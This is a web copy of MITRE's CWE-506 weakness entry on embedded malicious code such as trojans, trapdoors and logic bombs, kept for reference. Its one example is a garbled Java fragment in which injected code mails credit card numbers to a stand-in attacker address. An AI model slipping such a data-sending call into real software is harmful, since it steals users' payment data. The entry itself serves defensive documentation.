CWE-506: Embedded Malicious Code

Description

The product contains code that appears to be malicious in nature.

Submission Date :

July 19, 2006, midnight

Modification Date :

2023-10-26 00:00:00+00:00

Organization :

MITRE
Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

Example Vulnerable Codes

Example - 1

In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.


// // Authorize credit card.// 
// ...// 
mailCardNumber(ccn, "evil_developer@evil_domain.com");boolean authorizeCard(String ccn) {}

Related Weaknesses

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined to give an overview of the different insight to similar items that may exist at higher and lower levels of abstraction.

Visit http://cwe.mitre.org/ for more details.